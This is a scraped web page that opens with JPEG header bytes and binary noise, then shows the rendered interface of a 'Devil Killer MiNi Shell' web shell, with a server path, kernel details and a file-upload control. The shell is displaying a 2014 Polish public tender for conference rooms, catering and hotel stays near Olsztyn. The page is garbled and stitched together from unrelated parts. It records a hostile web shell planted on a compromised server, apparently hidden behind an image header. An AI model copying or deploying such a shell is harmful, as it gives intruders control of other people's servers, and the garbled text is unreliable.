JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141205/400200-N-2014.html

<p class="kh_header"><b>Olsztyn: Wynajem sal: konferencyjnej i warsztatowych, zapewnienie wyżywienia oraz noclegów dla uczestników konferencji i warsztatów w ramach projektu PI - Opracowanie i upowszechnienie innowacyjnego narzędzia świadczenia kompleksowych usług doradczych</b><br>
<b>Numer ogłoszenia: 400200 - 2014; data zamieszczenia: 05.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Warmińsko-Mazurska Agencja Rozwoju Regionalnego S.A. w Olsztynie , Plac Generała Józefa Bema 3, 10-516 Olsztyn, woj. warmińsko-mazurskie, tel. 89 5211250, 5211286, faks 89 5211260.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wmarr.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wynajem sal: konferencyjnej i warsztatowych, zapewnienie wyżywienia oraz noclegów dla uczestników konferencji i warsztatów w ramach projektu PI - Opracowanie i upowszechnienie innowacyjnego narzędzia świadczenia kompleksowych usług doradczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa: 
Wynajmu sal: konferencyjnej i warsztatowych, zapewnienie wyżywienia oraz noclegów dla uczestników konferencji i warsztatów w ramach projektu PI - Opracowanie i upo-wszechnienie innowacyjnego narzędzia świadczenia kompleksowych usług doradczych, w dniach 14.01.2015 r. - 16.01.2015 r.

Usługa obejmuje: 
a) wynajem sal: konferencyjnej i warsztatowych, 
b) pokoi hotelowych wraz ze śniadaniem, 
c) zapewnienie pełnego wyżywienia wraz z serwisem kawowym 

dla uczestników konferencji i warsztatów organizowanych w ramach projektu PI - Opracowanie i upowszechnienie innowacyjnego narzędzia świadczenia kompleksowych usług doradczych.

3.1. 
Wykonawca zobowiązuje się do zapewnienia;
a) 1 Sali konferencyjnej (łącznie 6 godzin zegarowych)
b) 2 Sal szkoleniowych na czas warsztatów (łącznie 20 godzin dydaktycznych)
c) 1-osobowych pokoi hotelowych wraz z łazienką oraz śniadaniem (łącznie 2 noc-legi, w tym: 1 nocleg 14.01.2015 -15.01.2014r. - dla min. 80 osób (+-10), 2 nocleg 15.01.2015 r.- 16.01.2014 - dla min. 40 osób
d) całodziennego wyżywienia (w tym serwisu kawowego) 

3.2. 
Zamawiający wymaga przeprowadzenia usługi w jednym z hoteli położnych na terenie województwa warmińsko-mazurskiego (z wykluczeniem miasta Olsztyn), do 60 km. od siedziby Zamawiającego, Pl. Gen. Józefa Bema 3, Olsztyn, liczone wg. mapy Google. Hotel powinien spełnić standard hotelu zaszeregowanego w kategorii co najmniej cztero-gwiazdkowej, zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 roku w sprawie obiektów hotelarskich i innych obiektów, w których świadczone są usługi hotelarskie (tj. Dz. U. z 2006 r. Nr 22 poz. 169).

3.1.3. Zamówienie należy wykonać zgodnie z wymogami określonymi poniżej: 
1)	Liczba uczestników: 
a) 14.01.2015 r. (konferencja) - 80 osób (+- 10); 
b) 14.01, 15.01 oraz 16.01.2015 r. (warsztaty) - maksymalnie 40 osób/spośród osób biorących udział w konferencji/
2)	Termin realizacji zamówienia: 14-16.01.2015 r.
3)	Czas trwania konferencji:
a) 1 dzień (14.01.2015 r.), rozpoczęcie (przyjazd) ok. godziny 09.00 dnia pierw-szego, zakończenie 15.01.2015 r. (wyjazd ok. 40 osób +-10) - ok godziny 12.00 dnia drugiego, niezależnie od doby hotelowej.
4)	Czas trwania warsztatów: 
a) 1 dzień (14.01.2015 r.), rozpoczęcie ok. godziny 16.00 zakończenie ok. godziny 19.00; 
b) 2 dzień (15.01.2015 r.) rozpoczęcie ok. godziny 08.00, zakończenie ok. godziny 19.00; 
c) 3 dzień (16.01.2015 r.) rozpoczęcie ok. godziny 08.00, zakończenie ok. godziny 13.15. 
5)	Miejsce organizacji szkolenia: obiekt konferencyjno-hotelowy stanowiący odrębny budynek lub zespół budynków, z wykluczeniem domków, położny na terenie województwa warmińsko-mazurskiego (z wykluczeniem miasta Olsztyn), do 60 km. od siedziby Zamawiającego, tj. Pl. Gen. Józefa Bema 3, Olsztyn,  liczone wg. mapy Google. Hotel powinien spełniać standard hotelu zaszeregowanego w kategorii co najmniej czterogwiazdkowej, zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 roku w sprawie obiektów hotelarskich i innych obiektów, w których świadczone są usługi hotelarskie (tj. Dz. U. z 2006 r. Nr 22 poz. 169).
6)	Standard miejsca realizacji konferencji i warsztatów: Wykonawca zapewni realiza-cję usług w obiekcie konferencyjno-hotelowym z zapleczem noclegowo-restauracyjnym, posiadającym przyznaną kategorię co najmniej czterogwiazdkową (zgodnie z kategoryzacją obiektów konferencyjno-hotelowych/hoteli uzyskaną zgodnie z wymaganiami ustawy z 29 sierpnia z 1997 r. oraz rozporządzenia Mini-stra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (Dz. U. z 2006 r. Nr 22, poz. 169 z późn. zm.). 
7)	Wykonawca zobligowany jest do świadczenia usług hotelarskiej, gastronomicznej i szkoleniowej w tym samym obiekcie konferencyjno-hotelowym (budynku). 
UWAGA: 
1.	W przypadku otrzymania przez Wykonawcę informacji o przybyciu mniejszej niż przewidziana ilości uczestników konferencji, warsztatów (ale nie mniej niż 20%) lub nieskorzystaniu przez nich z noclegu zobowiązuje się on do proporcjonalnego obniżenia ceny zakwaterowania w stosunku do ceny pod-stawowej, w oparciu o faktyczną ilość uczestników; 
2.	Zamawiający nie pokrywa kosztów zakwaterowania ani wyżywienia osób towarzyszących uczestnikom konferencji, warsztatów; 
3.	Zamawiający nie pokrywa kosztów krajowych i zagranicznych rozmów tele-fonicznych wykonywanych z pokoi hotelowych przez osoby zakwaterowane; 
4.	Zamawiający nie pokrywa kosztów związanych z udostępnieniem 
w pokojach mini-baru, płatnej tv itp.; 
5.	wyżej wymienione i inne koszty, które nie są związane z wykonywaniem przedmiotu zamówienia i warunkami stawianymi przez Zamawiającego, Wy-konawca obciąży indywidualnie osoby zakwaterowane. 

8)	Sala konferencyjna: 
a.	Wykonawca zobligowany jest do zapewnienia klimatyzowanej sali konferencyjnej dla minimum 80 uczestników (+-10), wyposażonej 
w ekran, rzutnik multimedialny, laptop, tablicę typu flipchart, nagłośnienie, z bezprzewodowym i przewodowym dostępem do Internetu wraz z obsługą wypo-sażenia. Ustawienie stołów i krzeseł teatralnie, mównica dla prelegenta.

9)	Sale warsztatowe:
a.	Wykonawca zobligowany jest do zapewnienia 2 klimatyzowanych sal warsztatowych, w dniu 14.01.2015 1 Sali dla max. 40 osób, w dniach 15.01.2015 oraz 16.01.2015 2 sal każda dla min. 15 uczestników + 2 trenerów, maksymalnie do 20 os., każda wyposażona w ekran, rzutnik multimedialny, laptop, tablicę typu flipchart, nagłośnienie, z bezprzewodowym i przewodowym dostępem do Internetu wraz z obsługą wyposażenia. Stoły i krzesła w salach ustawione w sposób pozwalający pracować w zespołach.
10)	Zapewnienie miejsc noclegowych ze śniadaniem: 
a) 14.01.2015 r. - dla min. 80 osób (+-10), w tym: min. 80 pokoi jednoosobowych (+-10).
b) 15.01.2015 r. - dla 40 osób, w tym: 40 pokoi jednoosobowych 
11)	Zapewnienie całodziennego wyżywienia dla uczestników konferencji 
i warsztatów:
c) 14.01.2015 r. - dla min. 80 osób (+-10) - (obiad, uroczysta kolacja integracyjna z oprawą muzyczną, serwis kawowy ciągły-od 11.00-15.00) 
12)	Zapewnienie całodziennego wyżywienia dla uczestników warsztatów:
a) 14.01.2015 r. - dla 40 osób - (1 grupa max. 40 osób - serwis kawowy ciągły, od 16.00-19.00) 
b) 15.01.2015 r. - dla maksymalnie 40 osób - (obiad, kolacja, serwis kawowy ciągły dla 2 grup po maksymalnie 20 osób od 08.00-19.00)
c) 16.01.2015 r. - dla maksymalnie 40 osób - (obiad,  serwis kawowy ciągły dla 2 grup po maksymalnie 20 osób od 08.00-13.15)
13)	Parking: Wykonawca zobowiązany jest do nieodpłatnego udostępnienia miejsc par-kingowych dla uczestników konferencji, warsztatów (w bezpośrednim sąsiedztwie obiektu konferencyjno-hotelowego).  
Wykonawca otrzyma informację dotyczącą ostatecznej ilości uczestników korzystających z miejsc noclegowych najpóźniej na 3 dni przed rozpoczęciem konferencji i warsztatów. 

Rozliczenie odbywać się będzie na podstawie faktycznie wykonanego zakresu umowy 
i ustalonej ceny jednostkowej.

Wymeldowanie uczestników konferencji i warsztatów nastąpi do godziny 12.00 niezależnie od doby hotelowej. 

Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w trybie z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt. 6 ustawy. polegających na powtórzeniu tego samego rodzaju zamówienia opisanego w pkt 3 SIWZ</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.22.00.00-9, 55.30.00.00-3, 55.10.00.00-1, 55.11.00.00-4, 55.12.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełni Wykonawca, który wykaże że w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krót-szy - w tym okresie), wykonał należycie co najmniej 2 usługi obejmujące swoim zakresem usługę wynajmu sal konferencyjnych/warsztatowych, zapewnienie cater-ingu oraz noclegów dla uczestników konferencji, warsztatów lub przedsięwzięcia o podobnym charakterze, o łącznej wartości nie mniejszej niż 50.000 zł brutto każda. 
Potwierdzeniem spełnienia tego warunku, będzie wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia dzia-łalności jest krótszy - w tym okresie, wraz z podaniem nazwy i adresu zamawiającego, miejsca i zakresu wykonania usługi, czasu realizacji i wartości wykonanych usług oraz dowody, czy zostały wykonane lub są wykonywane należycie. Dowodami, o których mowa w zdaniu poprzedzającym są:
a)	Poświadczenie odbiorcy usługi, z tym, że w odniesieniu do nadal wykonywa-nych usług okresowych lub ciągłych, poświadczenie to powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, lub
b)	Oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt. a;
c)	W przypadku, gdy podmiotem, na rzecz którego wykonano usługi wskazanej przez Wykonawcę w wykazie, o którym mowa wyżej, jest Warmińsko Mazur-ska Agencja Rozwoju Regionalnego S.A., Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt a i b.
INFORMACJA O POSIADANIU WIEDZY I DOŚWIADCZENIA (wykaz wykonywanych usług) wg. załącznika nr 4</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca wskaże hotel czterogwiazdkowy, w którym będzie realizowana dana usługa poprzez podanie nazwy, adresu oraz linka do strony internetowej hotelu
Informację należy podać w pkt 9 Formularza oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań w zakresie tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca złoży oświadczenie na podstawie art. 22 ustawy
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie oświadczeń i dokumentów jakie Wykonawca załączy do oferty metodą spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony formularz ofertowy załącznik nr 1. 
2.	 Oświadczenie o braku powiązań kapitałowych i osobowych z Zamawiającym zgodnie z załącznikiem nr 6.
3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 PZP, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b PZP, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów, o których mowa w pkt 9.1 (tabela) Lp. 2 ppkt od 2 do 3 (z wyłączeniem oświadczenia o spełnianiu warunków udziału w postępowaniu). Ponadto, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do tych zasobów, Zamawiający żąda przedstawienia w ofercie dokumentów dotyczących w szczególności:
a)	zakresu dostępnych Wykonawcy zasobów innego podmiotu;
b)	sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia;
c)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem;
d)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie w zakresie realizacji usług hotelowych wraz z wynajmem sal konferencyjnych/warsztatowych oraz cateringiem - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian
Zamawiający przewiduje możliwość dokonania następujących istotnych zmian w zawartej umowie w sprawie niniejszego zamówienia publicznego, określając jednocześnie warunki ich wprowadzenia:
1 zmiany liczby uczestników konferencji/warsztatów wg wcześniejszych ustaleń mailo-wych,
2 zmiany terminu konferencji/warsztatów na skutek odwołania przez Kierownika projektu wg wcześniejszych ustaleń mailowych,
3 wydłużenia okresu realizacji umowy na skutek okoliczności, których strony nie mogły przewidzieć w chwili jej zawarcia (np. zmian w harmonogramie realizacji projektu).
4 Zmianie mogą ulec terminy realizacji przedmiotu umowy, o których mowa w § 2 Umowy w przypadku:
a)	wystąpienia konieczności ograniczenia zakresu rzeczowego przedmiotu zamówienia,
b)	przedłużenie z tytułu nieprzewidzianych sytuacji
5 Zamawiający dopuszcza zmianę postanowień zawartej umowy w przypadku ustawowej zmiany wysokości podatku VAT,
6 Przewiduje się możliwość ograniczenia zakresu rzeczowego przedmiotu zamówienia w sytuacji nie wykorzystania pełnego zakresu ilościowego umowy w przypadku zre-krutowania mniejszej ilości uczestników - zgodnie z zapisami istotnych warunków umów. Płatność w takim przypadku, dokonywana będzie na podstawie faktycznie przeprowadzonego i zatwierdzonej przez Zamawiającego liczby uczestników konfe-rencji i warsztatów. Sytuacja ta nie może być podstawą do roszczenia Wykonawcy o zakup niezrealizowanej części umowy, ani do dochodzenia jakichkolwiek innych roszczeń z tego tytułu.
7 Zmiana przepisów prawa powszechnie obowiązującego bądź zasad realizacji projektów w ramach Programu Operacyjnego Kapitał Ludzki.
8 Każda zmiana postanowień niniejszej Umowy wymaga formy pisemnej w postaci anek-su, pod rygorem nieważności.
9. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 14 dni od powzięcia wiadomości o tych okolicznościach. W takim wypadku Wykonawca może żądać wy-łącznie wynagrodzenia należnego mu z tytułu wykonania części umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wmarr.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Warmińsko-Mazurska Agencja Rozwoju Regionalnego S.A. w Olsztynie Plac Gen. Józefa Bema 3 10-516 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2014 godzina 11:00, miejsce: Warmińsko-Mazurska Agencja Rozwoju Regionalnego S.A. w Olsztynie Plac Gen. Józefa Bema 3 10-516 Olsztyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




